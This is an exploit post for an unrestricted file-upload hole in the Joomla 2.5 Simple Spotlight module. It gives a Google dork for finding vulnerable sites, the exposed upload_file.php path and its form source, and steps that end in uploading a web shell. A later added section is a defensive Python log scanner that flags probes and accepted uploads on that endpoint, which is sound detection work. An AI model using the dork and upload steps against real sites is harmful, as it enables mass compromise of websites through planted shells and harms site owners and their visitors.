Joomla 2.5 Modules Simple Spotlight Upload Shell [Old 3xploi7]


#- Title: Joomla 2.5 Modules Simple Spotlight Upload Shell
#- Author: BL4ckc0d1n6
#- Published : 3-22-2012
#- Developer : joomla
#- Link Download : extensions.joomla .org/extension/simple-spotlight
#- Price : Free
#- Google Dork: inurl:/modules/mod_ppc_simple_spotlight/
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Simple spotlight is a jQuery image rotator with navigation. You can have up to 20 images with links. You can turn off the navigation and choose between 27 effects for transition. It also has 5 button styles and a shadow effect.


Vulnerability : 
site/path/modules/mod_ppc_simple_spotlight/elements/upload_file.php

Result : 13k +

When vulnerable :

Source :


<script language="JavaScript">
function refreshParent() {
window.close();
if (window.opener && !window.opener.closed) {
window.opener.location.reload();
}
}
</script>
<form name="newad" method="post" enctype="multipart/form-data" action="">
<table>
<tr>
<td>
<input type="file" name="image">
</td>
</tr>
<tr>
<td>
<input name="Submit" type="submit" value="Upload image">
<input type="button" value="Close" onclick="javascript: refreshParent()">
</td>
</tr>
</table>
</form>



~ Method ~

1. Site .com
2. add 3xploi7 = /modules/mod_ppc_simple_spotlight/elements/upload_file.php
3. Ex : Site .com/modules/mod_ppc_simple_spotlight/elements/upload_file.php
4. Upload your shell / images / html file

If successful >

Shell Access ? Click Here
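
For defenders, the requests in the Method steps leave a trace in the web server access log. The Python below is an added example, not part of the original post: it assumes the Apache/nginx combined log format, the names `classify` and `scan` are hypothetical, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import unquote

# Endpoint path taken from the advisory text.
ENDPOINT = "/modules/mod_ppc_simple_spotlight/elements/upload_file.php"

# Apache/nginx "combined" access-log layout (assumption).
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def classify(method, status):
    """Rank a hit on the endpoint by how urgently it needs follow-up."""
    if status in (403, 404, 410):
        return "blocked"            # endpoint already removed or denied
    if method == "POST" and 200 <= status < 300:
        return "upload-accepted"    # server processed a form submission
    return "probe"                  # endpoint reachable, no accepted POST

def scan(lines):
    """Return {client_ip: [(timestamp, verdict), ...]} for hits on ENDPOINT."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx, collapse // and /./, and lower-case
        # (the advisory was tested on Windows, where paths are case-insensitive).
        raw = m["target"].split("?", 1)[0]
        path = normpath(unquote(raw)).lower()
        if ENDPOINT in path:        # substring match also covers sub-directory installs
            hits[m["ip"]].append((m["ts"], classify(m["method"], int(m["status"]))))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [22/Mar/2012:10:01:02 +0000] "GET /modules/mod_ppc_simple_spotlight/elements/upload_file.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [22/Mar/2012:10:01:09 +0000] "POST /joomla//modules/MOD_ppc_simple_spotlight/elements/upload%5Ffile.php?x=1 HTTP/1.1" 200 530 "-" "-"',
    '203.0.113.9 - - [22/Mar/2012:11:00:00 +0000] "POST /modules/mod_ppc_simple_spotlight/elements/upload_file.php HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.4 - - [22/Mar/2012:11:05:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in scan(SAMPLE).items():
        print(ip, events)
```

Any `upload-accepted` verdict warrants reviewing files created on the server around that timestamp; a `blocked` verdict shows the endpoint is already denied or removed.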


ABOUT THE AUTHOR

Ceyron Louis
